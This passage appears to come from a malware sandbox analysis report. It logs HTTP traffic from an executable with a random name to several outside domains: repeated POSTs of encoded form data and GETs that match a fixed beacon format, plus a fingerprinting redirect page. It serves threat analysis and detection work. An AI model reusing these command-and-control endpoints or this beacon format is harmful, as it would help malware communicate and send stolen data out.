                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:16.117191076 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:16 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088056.4264178; expires=Sat, 18-Nov-2034 07:34:16 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 1541
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 76 70 71 62 2f 3f 47 52 35 34 79 48 5a 38 3d 69 64 4b 65 63 6b 4c 41 68 32 51 49 47 42 39 4b 5a 4a 49 52 4a 53 2f 6f 5a 4d 47 64 54 77 57 31 46 6a 6d 49 39 46 4c 4d 30 77 51 55 35 7a 73 73 6a 55 33 54 62 38 75 41 4b 66 59 6d 62 37 50 71 79 75 2f 51 66 49 4b 59 5a 51 67 65 46 63 50 6c 77 49 75 6f 76 35 68 58 79 78 76 6b 59 63 7a 56 73 56 75 64 64 76 31 54 4b 72 39 38 66 56 36 37 48 4d 55 55 4e 69 58 6b 33 30 4e 4a 4f 51 69 57 4d 74 72 46 2b [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
                                                                                  Nov 20, 2024 08:34:16.117252111 CET577INData Raw: 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e
                                                                                  Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.65003113.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:21.170445919 CET807OUTPOST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 71 49 57 6f 39 58 69 78 68 50 50 4d 6d 50 41 57 76 71 59 48 5a 48 5a 79 32 37 44 77 4b 73 34 2b 35 4d 4a 33 4f 37 57 48 2f 48 74 34 38 6c 6a 2b 76 69 59 79 36 75 77 64 41 4d 35 73 45 49 43 77 4a 76 63 38 66 42 6f 6b 6a 34 32 66 31 2f 32 47 45 67 6e 41 6d 62 52 4f 59 55 62 54 6c 62 79 74 48 71 45 62 39 54 45 44 6d 79 45 7a 71 48 34 61 56 7a 6d 6c 34 34 69 48 77 68 51 48 76 71 38 4f 36 42 53 6c 4d 71 66 72 37 7a 5a 79 34 30 49 78 4b 4c 6c 35 34 4f 33 36 65 50 73 6e 41 4a 33 46 51 45 6f 56 6c 62 41 2f 7a 62 74 79 34 54 7a 4b 59 35 31 4c 32 33 39 51 52 6f 45 43 4d 43 4c 71
                                                                                  Data Ascii: GR54yHZ8=4AenQeI0YV+kqIWo9XixhPPMmPAWvqYHZHZy27DwKs4+5MJ3O7WH/Ht48lj+viYy6uwdAM5sEICwJvc8fBokj42f1/2GEgnAmbROYUbTlbytHqEb9TEDmyEzqH4aVzml44iHwhQHvq8O6BSlMqfr7zZy40IxKLl54O36ePsnAJ3FQEoVlbA/zbty4TzKY51L239QRoECMCLq


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.65003213.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:23.727310896 CET831OUTPOST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 72 70 6d 6f 78 55 36 78 67 76 50 50 69 2f 41 57 6d 4b 59 62 5a 48 64 79 32 2f 7a 65 4b 5a 6f 2b 67 70 74 33 50 36 57 48 79 6e 74 34 7a 46 6a 2f 72 69 59 74 36 75 73 6a 41 4f 39 73 45 49 47 77 4a 76 4d 38 66 79 77 6e 78 59 32 64 67 76 32 41 4a 41 6e 41 6d 62 52 4f 59 55 4f 49 6c 66 57 74 41 61 30 62 79 57 77 43 72 53 46 42 70 48 34 61 45 6a 6d 68 34 34 69 31 77 6b 35 63 76 75 4d 4f 36 42 69 6c 4d 66 7a 6f 78 7a 5a 6f 6c 45 49 36 44 4a 30 68 68 6f 75 65 56 5a 73 4b 64 2b 6a 4f 56 79 31 50 35 6f 41 63 68 4c 4e 77 34 52 72 34 59 5a 31 68 30 33 46 51 44 2f 49 6c 44 32 75 4a 61 32 4d 36 54 68 38 61 77 58 30 72 49 41 71 63 79 4f 4f 64 55 41 3d 3d
                                                                                  Data Ascii: GR54yHZ8=4AenQeI0YV+krpmoxU6xgvPPi/AWmKYbZHdy2/zeKZo+gpt3P6WHynt4zFj/riYt6usjAO9sEIGwJvM8fywnxY2dgv2AJAnAmbROYUOIlfWtAa0byWwCrSFBpH4aEjmh44i1wk5cvuMO6BilMfzoxzZolEI6DJ0hhoueVZsKd+jOVy1P5oAchLNw4Rr4YZ1h03FQD/IlD2uJa2M6Th8awX0rIAqcyOOdUA==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.65003313.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:26.276673079 CET1844OUTPOST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 72 70 6d 6f 78 55 36 78 67 76 50 50 69 2f 41 57 6d 4b 59 62 5a 48 64 79 32 2f 7a 65 4b 5a 67 2b 38 50 78 33 4f 64 43 48 7a 6e 74 34 2b 6c 6a 36 72 69 5a 33 36 75 6b 6e 41 4f 78 38 45 4c 75 77 4c 4e 30 38 49 54 77 6e 6f 6f 32 64 69 76 32 42 45 67 6e 4a 6d 62 42 4b 59 55 65 49 6c 66 57 74 41 59 73 62 32 44 45 43 70 53 45 7a 71 48 34 4f 56 7a 6d 46 34 38 32 6c 77 6b 31 4d 76 64 45 4f 36 6c 4f 6c 4f 4a 48 6f 79 54 5a 32 6d 45 4a 36 44 4a 34 41 68 73 47 38 56 5a 77 67 64 35 4c 4f 56 55 38 59 71 4b 6f 74 69 6f 78 67 6f 77 33 52 57 2b 49 57 73 78 5a 4a 4b 4f 6f 54 4b 33 43 69 55 42 63 63 47 67 42 75 78 33 38 57 55 48 4c 50 6e 66 6a 69 4a 4f 37 2b 36 55 7a 7a 54 36 34 4e 65 4a 30 62 64 78 59 48 44 59 52 33 49 6c 42 77 73 66 57 6f 45 2f 6b 56 4c 54 69 53 4e 53 61 65 4c 44 64 45 4f 61 47 55 43 56 36 62 50 58 53 65 61 64 49 66 4f 68 34 53 56 37 36 71 5a 62 41 6a 4e 62 4e 2b 36 58 33 77 2f 6e 58 71 65 61 2b 74 6f 38 53 65 30 52 52 6a 74 71 35 2f 58 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=4AenQeI0YV+krpmoxU6xgvPPi/AWmKYbZHdy2/zeKZg+8Px3OdCHznt4+lj6riZ36uknAOx8ELuwLN08ITwnoo2div2BEgnJmbBKYUeIlfWtAYsb2DECpSEzqH4OVzmF482lwk1MvdEO6lOlOJHoyTZ2mEJ6DJ4AhsG8VZwgd5LOVU8YqKotioxgow3RW+IWsxZJKOoTK3CiUBccGgBux38WUHLPnfjiJO7+6UzzT64NeJ0bdxYHDYR3IlBwsfWoE/kVLTiSNSaeLDdEOaGUCV6bPXSeadIfOh4SV76qZbAjNbN+6X3w/nXqea+to8Se0RRjtq5/XKm1sAzoLJrWJcLMWZ/4b+McgDiCtJSKO2e73cpHSD+f4tyZWNRHJ3CD02bLgEi87pfw+cpmV/hV1CqlhEnA0VOe1yQtdAMU3/xv4uJ6gKHxmmodITvdUcvvo/O7E3KyhxKSY//fSyN9uMyyq6+aMin9nHmIGlq6badzAfk1jDp9N4pEz5cHFdhjiVzI6Tfdvr9vwEZWWIaMN5iImmDTWEar/6FSKpGmqMUoaMZYG+jSvn0i9wH3yor3grGJ/fxJENedFTAhQewPsKEPUS2GUPiDO0iwxSAWAqJQCKa6h3dvDXAtCA1B0kHI+2+tANhqMQo36lqqhYj/T2e0L8Sorp94VSGZEUTRxW2mmghyjV32nOXkgLkb2RboBA4x52NXRvO298+3nIa41hnQ6hePmDa0OyFtAEvxHxmcSlbUlHx2iQBLM7gIjq4VwJvJO9SQfnKuhhvhfOapnAvVELIDcLcCCAoacyS0Nbzsqqj7GLHY7CZW7kYqNick6OjTe05CQBQjTS6FHOoM0bDXgbn/bTA6tsdfNAGE6LDtgIL3CnvDcgOjOfDYFnuQ51bZ5ATw3oZLRNsO9iFgKIW7fpjUdpmjkaayoqgmeFWYfthnkm2yk9yqZ2IO7EmNfFoRigEcts1/OpCuQ2QckX6Xs4AXikgUnrXlBJN0818 [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.65003413.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:28.879338980 CET553OUTGET /0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:29.347915888 CET417INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:34:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 52 35 34 79 48 5a 38 3d 31 43 32 48 54 72 45 56 4e 57 79 78 72 35 32 53 6f 47 4f 78 6c 4c 4c 63 76 73 4e 42 6f 65 78 6d 64 79 39 4e 75 37 48 64 58 39 6c 52 37 73 77 41 4d 4c 6e 33 31 47 68 57 7a 58 2f 57 74 69 6f 5a 69 4c 67 6b 49 72 31 54 49 59 54 70 51 76 34 6c 66 51 34 54 77 4e 6e 66 69 4d 36 33 63 78 7a 65 71 66 4e 65 47 31 44 32 39 74 7a 69 49 70 41 45 32 48 64 72 30 6b 74 38 6f 45 4d 74 45 46 2b 57 39 72 62 77 33 55 41 3d 26 39 78 6e 3d 66 48 61 64 4e 70 6b 38 4d 56 61 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.65003513.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:34.441217899 CET807OUTPOST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 42 57 48 41 76 55 6d 51 30 43 67 4c 33 52 78 39 42 66 77 64 41 49 79 44 69 36 6a 73 49 6b 59 2f 4c 6a 31 75 51 52 54 32 76 6a 65 4a 4f 6f 44 64 6c 4b 52 5a 49 4a 55 73 43 52 4e 53 6c 52 44 76 4c 4f 76 54 71 77 6a 48 48 7a 35 2f 47 74 76 32 4c 5a 68 2b 53 63 35 42 51 42 62 5a 6e 4f 69 4d 32 66 2b 75 49 64 67 59 31 52 64 71 30 33 32 31 53 4a 62 53 55 66 35 43 4f 59 45 38 69 75 49 4b 46 37 4c 58 31 65 54 57 52 58 5a 6d 72 36 37 42 62 39 2f 4f 71 43 72 48 64 78 56 42 43 47 6e 67 78 36 58 5a 68 45 36 57 6e 6e 4a 7a 76 59 31 76 2b 34 43 57 78 48 67 30 68 46 30 4a 2f 73 6c 46
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1BWHAvUmQ0CgL3Rx9BfwdAIyDi6jsIkY/Lj1uQRT2vjeJOoDdlKRZIJUsCRNSlRDvLOvTqwjHHz5/Gtv2LZh+Sc5BQBbZnOiM2f+uIdgY1Rdq0321SJbSUf5COYE8iuIKF7LX1eTWRXZmr67Bb9/OqCrHdxVBCGngx6XZhE6WnnJzvY1v+4CWxHg0hF0J/slF


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.65003613.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:36.993566990 CET831OUTPOST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 43 32 58 41 74 33 2b 51 6c 53 67 49 72 42 78 39 49 2f 77 52 41 49 2b 44 69 37 57 78 4c 58 38 2f 4b 42 74 75 52 54 37 32 6f 6a 65 4a 46 49 44 45 71 71 51 62 49 4a 49 4b 43 54 5a 53 6c 52 58 76 4c 4c 44 54 72 48 33 49 46 6a 35 35 66 64 76 30 57 4a 68 2b 53 63 35 42 51 41 2f 7a 6e 4b 4f 4d 71 2f 4f 75 4f 34 4d 58 30 52 64 72 31 33 32 31 44 35 62 57 55 66 34 6e 4f 5a 59 47 69 74 67 4b 46 36 37 58 31 71 6e 56 49 6e 5a 67 76 36 36 74 4c 66 79 5a 69 52 62 44 58 54 64 46 57 31 7a 39 77 4d 4b 44 39 33 36 31 31 33 70 78 76 61 74 64 2b 59 43 38 7a 48 59 30 7a 53 34 75 77 59 41 6d 70 43 44 49 33 34 41 79 79 55 57 61 49 2f 63 59 75 52 52 32 30 41 3d 3d
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX8/KBtuRT72ojeJFIDEqqQbIJIKCTZSlRXvLLDTrH3IFj55fdv0WJh+Sc5BQA/znKOMq/OuO4MX0Rdr1321D5bWUf4nOZYGitgKF67X1qnVInZgv66tLfyZiRbDXTdFW1z9wMKD936113pxvatd+YC8zHY0zS4uwYAmpCDI34AyyUWaI/cYuRR20A==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.65003713.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:39.543355942 CET1844OUTPOST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 43 32 58 41 74 33 2b 51 6c 53 67 49 72 42 78 39 49 2f 77 52 41 49 2b 44 69 37 57 78 4c 58 30 2f 4b 79 6c 75 54 30 6e 32 70 6a 65 4a 47 49 44 42 71 71 51 61 49 4a 41 4f 43 54 46 6b 6c 53 76 76 61 64 58 54 69 54 62 49 50 6a 35 35 58 39 76 31 4c 5a 67 38 53 63 70 64 51 42 50 7a 6e 4b 4f 4d 71 38 57 75 4e 74 67 58 35 78 64 71 30 33 32 44 53 4a 61 78 55 66 67 52 4f 59 74 37 69 63 41 4b 45 61 72 58 79 4a 50 56 58 58 5a 69 68 61 36 31 4c 66 2f 65 69 52 47 34 58 53 70 6a 57 33 76 39 38 70 33 70 67 54 79 4e 71 45 74 52 2b 4b 30 37 33 59 43 63 79 45 4d 49 77 55 6f 66 76 71 34 35 6d 6d 4c 7a 69 4f 39 54 38 56 69 74 42 4c 41 47 36 45 74 7a 75 55 48 59 33 44 62 73 47 51 6e 69 46 5a 5a 74 56 51 35 6c 73 4e 46 6f 36 52 63 4e 2b 4f 4a 34 79 49 6f 43 54 46 52 4a 66 76 6a 59 72 6d 76 49 47 2f 70 4e 30 38 41 34 56 4a 39 75 68 4d 70 2b 52 70 38 53 72 4e 6b 79 4d 67 37 4e 4a 6f 49 30 38 68 66 59 54 6a 6f 47 32 63 46 56 45 6d 31 38 56 45 51 4a 4e 6a 4d 2f 52 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX0/KyluT0n2pjeJGIDBqqQaIJAOCTFklSvvadXTiTbIPj55X9v1LZg8ScpdQBPznKOMq8WuNtgX5xdq032DSJaxUfgROYt7icAKEarXyJPVXXZiha61Lf/eiRG4XSpjW3v98p3pgTyNqEtR+K073YCcyEMIwUofvq45mmLziO9T8VitBLAG6EtzuUHY3DbsGQniFZZtVQ5lsNFo6RcN+OJ4yIoCTFRJfvjYrmvIG/pN08A4VJ9uhMp+Rp8SrNkyMg7NJoI08hfYTjoG2cFVEm18VEQJNjM/RJ3vk9Z84dn3ffs9R/+dLgyEYP+HlMiHDiAxiEyxro0qvdgoaD563O5c/INeq0/jBYzQ9DeJbXV3N2VBWctctDGWmCd+L9dsL42Hv80SfVWMsk4L6pXkA8x9CsaDpJ1DapaarbVs+mDKcGTUhDSaKHQjd+Qu3e/My1IgrrhJhugIoZH5RLv5Tne47ZKGkQA1RTHzaY0QU13wYaynpTmAHdH6x6XjOlCG7n1QVZiMf6KnM4fOqnhn1okqYGjq22gL6BPFWMujd7HJXhRq1uOJ1Q8GmRff0bUOY9FW8m3K5Jkrqx+9Y6NRIBVQ4pBQrTydz1elL3rsOFl5uPQ31O4SZLihnD9C/aTGzGehZqa6Vm6DGtXCUct1q0xMpIh6tPoJK68ux+61U1UDoQIXcuJ/iETqYY2Kq6x3IWc3PrbJZRBpPElwBGZJPVcc18Me1olseUSNSvicMNbMMIkABgT4F76fbMYMCrEQxyXSxSjppJ0tBFSJW/8RAVZtFA8Eo2JO0jS9+sGYgZvyBpP4EAlPYPJlcE2K0YgfbPuafd5UpTa0BDEkBFb8UHkT16ZnNl7ywWaVHAbN/ULId3qu7ZTwoqe/GY7dFce/wmBsiqJCbF+M3T2dNvZJv29lnAxCGSfoBYXLs0D3z2ZXdzyMI5lummTE/FXgyUJEOSU [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.65003813.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:42.081414938 CET553OUTGET /g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:42.532031059 CET417INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:34:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
